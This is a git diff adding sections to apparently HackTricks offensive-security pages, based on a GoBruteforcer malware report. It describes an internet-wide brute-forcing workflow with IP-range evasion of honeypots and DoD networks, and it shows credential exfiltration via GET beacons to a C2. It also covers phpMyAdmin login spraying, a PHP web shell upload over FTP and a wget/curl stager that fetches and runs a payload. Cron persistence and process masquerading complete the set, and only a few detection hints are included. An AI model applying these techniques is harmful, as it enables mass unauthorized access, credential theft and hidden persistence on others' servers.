diff --git a/src/generic-hacking/brute-force.md b/src/generic-hacking/brute-force.md
index d0ed72f15f2..12e7bd218d0 100644
--- a/src/generic-hacking/brute-force.md
+++ b/src/generic-hacking/brute-force.md
@@ -95,6 +95,14 @@ Finished in 0.920s.
 - [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
 - [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
 
+## Internet-wide bruteforcer workflow (lessons from Go-based scanners)
+
+- Maintain **architecture-tuned worker pools** (for example, ~95 goroutines on `x86_64/arm64`, ~85 on `i686`, ~50 on low-end ARM) and respawn every second to keep **fixed concurrency**, with each worker handling exactly one target IP before exiting.
+- Generate **random public IPv4s** but drop obvious honeypot-heavy or unroutable ranges: RFC1918, `100.64.0.0/10`, `127.0.0.0/8`, `0.0.0.0/8`, `169.254.0.0/16`, `198.18.0.0/15`, multicast `>=224.0.0.0/4`, cloud-heavy `/8`s (`3/15/16/56`) and DoD-associated `/8`s (`6/7/11/21/22/26/28/29/30/33/55/214/215`).
+- **Probe the service port** with a short timeout (~2s) before attempting **cleartext logins** (FTP/21, MySQL/3306, Postgres/5432, phpMyAdmin over HTTP/80) and fall back to a **small builtin credential list** if the remote dictionary/C2 fetch fails.
+- **Exfiltrate hits** via tiny HTTP GET beacons such as `http://<c2>:9090/pst?i=<ip>&c=<svc_code>&u=<user>&p=<pass>&e=<extra>` (service codes like `1=PMA`, `2=MySQL`, `3=FTP`, `4=Postgres`) while reusing a common browser User-Agent to blend in.
+- **phpMyAdmin spray** can brute-force dozens of likely paths (~80+) with `GET /index.php?lang=en`, detect PMA markers (`pmahomme` theme/`phpmyadmin.css`/`navigation.php`) and parse `codemirror.css?v=X.Y.Z` to branch auth: versions `<4.9` accept GET params `pma_username`/`pma_password`; versions `>=4.9` require POST with `server=1`, CSRF `token`, and the same creds.
+
 ## Services
 
 Ordered alphabetically by service name.
@@ -893,6 +901,10 @@ Cracking Common Application Hashes
  1700 | SHA-512                                          | Raw Hash
 ```
 
+## References
+
+- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)
+
 {{#include ../banners/hacktricks-training.md}}
 
 
diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md
index 02ca7d343ac..4bc1770c6f3 100644
--- a/src/linux-hardening/linux-post-exploitation/README.md
+++ b/src/linux-hardening/linux-post-exploitation/README.md
@@ -120,6 +120,17 @@ Hardening
 - Avoid embedding creds in unit files; prefer root-only readable drop-in files and remove them from version control
 - Rotate leaked passwords discovered during tests
 
+## Cron-based persistence with loopback mutex
+
+- Copy implants into multiple writable paths (`/tmp`, `/var/tmp`, `/dev/shm`, `/run/lock`) and install cron entries such as `*/5 * * * * /tmp/<bin>` so they respawn even if removed elsewhere.
+- Enforce **single-instance** execution by binding a fixed loopback port (for example, `127.0.0.1:51125` or `127.0.0.1:52225`) and exiting if `bind()` fails; `ss -lntp | grep -E '51125|52225'` will reveal the mutex listener.
+- Operators may periodically mass-kill any process whose `cmdline` contains the dropper name (e.g., `init_stop`), so reusing those names during analysis can collide; pick unique filenames.
+
+## Process masquerading via prctl + argv overwrite
+
+- Set the short process name with `prctl(PR_SET_NAME, "<label>")` (15-byte `comm` limit), commonly to `init`, so `/proc/<pid>/status` and GUIs show a benign label.
+- Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc/<pid>/cmdline` and `ps` also show the fake label.
+- Hunt by comparing `Name:` in `/proc/<pid>/status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines.
 
 ## References
 
@@ -127,5 +138,6 @@ Hardening
 - [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
 - [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
 - [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
+- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-ftp/README.md b/src/network-services-pentesting/pentesting-ftp/README.md
index 46cb1cb95c3..9bdc1069a51 100644
--- a/src/network-services-pentesting/pentesting-ftp/README.md
+++ b/src/network-services-pentesting/pentesting-ftp/README.md
@@ -146,6 +146,12 @@ If your user/password has special characters, the [following command](https://st
 wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
 ```
 
+### FTP root mapped to webroot (XAMPP)
+
+- XAMPP/ProFTPD often maps FTP root to `/opt/lampp/htdocs`, so weak creds on service accounts like `daemon` or `nobody` let you **upload a PHP web shell directly into the served webroot**.
+- After uploading, trigger an **architecture-aware download/exec stager** via the shell, for example: `webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86)`, which fetches a checksum-validated payload, saves it (e.g., `init_start`), sets `chmod +x`, and runs it.
+- If the current directory is not writable/executable, the stager falls back to `/tmp`, so test web paths and filesystem permissions after upload.
+
 ## Some FTP commands
 
 - **`USER username`**
@@ -279,4 +285,8 @@ Entry_7:
   Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' &&  msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
 ```
 
+## References
+
+- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)
+
 {{#include ../../banners/hacktricks-training.md}}